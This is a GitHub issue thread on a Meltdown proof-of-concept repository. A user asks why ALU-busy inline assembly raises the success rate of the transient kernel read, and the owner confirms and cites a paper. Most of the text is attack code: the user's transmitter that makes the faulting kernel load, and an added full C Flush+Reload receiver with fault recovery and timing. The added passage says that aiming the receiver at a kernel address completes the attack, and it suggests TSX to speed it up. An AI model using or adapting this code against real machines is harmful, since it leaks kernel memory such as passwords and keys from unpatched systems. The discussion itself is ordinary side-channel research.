
Confusion about part of the assembly code. #64

Open

howardzhang87 opened this issue Feb 19, 2018 · 1 comment

Comments

howardzhang87 commented Feb 19, 2018

I have managed to get rid of the assembly code and use C code to trigger Meltdown, but I still need part of the assembly code you wrote, which is not directly related to Meltdown, to make this work. See my code below:

/* probe array: one page per possible byte value (was left undeclared in the snippet) */
static unsigned char array[256 * 4096];

void meltdown_asm(unsigned long kernel_data_addr)
{
   /* unsigned: a plain (signed) char would index before array for values >= 0x80 */
   unsigned char kernel_data = 0;

   // ??? give the algorithmic units something to chew
   asm volatile(
       ".rept 400;"
       "add $0x141, %%eax;"
       ".endr;"

       :
       :
       : "eax"
   );

   kernel_data = *(char*)kernel_data_addr;   /* faults from user mode; the transient load is what matters */
   array[kernel_data * 4096] += 83;          /* dependent access encodes the byte into the cache */
}

The kernel data is in the cache. I have done some experiments and found out that the inline assembly code that keeps EAX busy is critical. In another issue post, you said: "give the algorithmic units something to chew while memory access is being speculated". In my understanding, while the CPU is executing the dummy asm code, since the memory fetching units are idle, they would fetch the kernel data ahead, out of order, which increases the possibility of success. Is my understanding correct? Many thanks!

My setup is Ubuntu 16.04 32bit VM running on i7-6600u.
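The snippet above shows only the transmitting half of a Meltdown attempt: the (faulting) load and the dependent `array[byte * 4096]` access. What it leaves out is how the process survives the fault and how the byte is read back out of the cache. The following is an added example, not code from this issue or from the paboldin/meltdown repository; it shows the fault recovery via sigsetjmp/siglongjmp and the Flush+Reload receiver that times each probe page. The secret is a constructed byte in user memory, so the read completes architecturally and only the covert channel is exercised; a PROT_NONE page stands in for the kernel address to show the fault path. Names such as `probe`, `attempt_read`, `best_bin` and `recover_byte` are this example's own, and the timing primitives (`_mm_clflush`, `__rdtscp`) are compiled only on x86.

```c
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
#define HAVE_X86_TIMING 1
#else
#define HAVE_X86_TIMING 0
#endif

#define PAGE 4096
#define BINS 256

/* Probe array: one page per byte value, same layout as array[kernel_data * 4096]. */
static uint8_t probe[BINS * PAGE] __attribute__((aligned(PAGE)));
static sigjmp_buf fault_jmp;

static void segv_handler(int sig)
{
    (void)sig;
    siglongjmp(fault_jmp, 1);   /* back into attempt_read; signal mask is restored */
}

/* Install the SIGSEGV handler that lets a faulting read be survived. */
int install_fault_handler(void)
{
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = segv_handler;
    sigemptyset(&sa.sa_mask);
    return sigaction(SIGSEGV, &sa, NULL);
}

/* Transmitter: read a byte and touch the probe page it selects. A kernel
 * address faults here; the attack relies on the dependent access having run
 * transiently before the fault is delivered. Returns 1 if the read faulted. */
int attempt_read(const volatile uint8_t *addr)
{
    if (sigsetjmp(fault_jmp, 1) == 0) {
        uint8_t v = *addr;
        probe[(size_t)v * PAGE] += 1;
        return 0;
    }
    return 1;
}

/* Receiver decision: the fastest-reloading bin is the one left in cache.
 * Ties go to the lowest index. */
int best_bin(const uint64_t times[BINS])
{
    int best = 0;
    for (int i = 1; i < BINS; i++)
        if (times[i] < times[best]) best = i;
    return best;
}

#if HAVE_X86_TIMING
static void flush_probe(void)
{
    for (int i = 0; i < BINS; i++) _mm_clflush(&probe[(size_t)i * PAGE]);
    _mm_mfence();
}

static uint64_t time_access(const volatile uint8_t *p)
{
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}
#endif

/* One Flush+Reload cycle per round, majority vote over rounds. Returns the
 * recovered byte, or -1 when the x86 timing primitives are unavailable. */
int recover_byte(const volatile uint8_t *addr, int rounds)
{
#if HAVE_X86_TIMING
    int votes[BINS] = {0};
    uint64_t times[BINS];
    for (int r = 0; r < rounds; r++) {
        flush_probe();
        attempt_read(addr);
        /* Scrambled visiting order keeps the stride prefetcher from loading
         * the next bin before it is timed. */
        for (int i = 0; i < BINS; i++) {
            int b = (i * 167 + 13) & (BINS - 1);
            times[b] = time_access(&probe[(size_t)b * PAGE]);
        }
        votes[best_bin(times)]++;
    }
    int best = 0;
    for (int i = 1; i < BINS; i++)
        if (votes[i] > votes[best]) best = i;
    return best;
#else
    (void)addr; (void)rounds;
    return -1;
#endif
}

int main(void)
{
    if (install_fault_handler() != 0) return 1;
    /* Constructed secret in user memory: exercises the channel, not the transient window. */
    static volatile uint8_t secret = 0x2A;
    printf("recovered 0x%02x (expected 0x2a)\n", recover_byte(&secret, 200));
    /* PROT_NONE page in place of a kernel address: the read faults and returns here. */
    void *p = mmap(NULL, PAGE, PROT_NONE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) return 1;
    printf("faulted=%d\n", attempt_read((const volatile uint8_t *)p));
    munmap(p, PAGE);
    return 0;
}
```

Pointing `recover_byte` at a kernel address turns this into the real attempt; that is where the ALU-busy padding discussed in the thread goes, immediately before the load inside `attempt_read`, and where the hit rate becomes CPU-dependent. A signal handler round trip per attempt is slow; PoCs that want throughput wrap the load in a TSX transaction instead, which suppresses the fault entirely.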

paboldin (Owner) commented

> Is my understanding correct?

Yes, it seems like this. The best-working sequence is architecture-dependent; a new paper looks for them automatically: https://arxiv.org/abs/1802.03802
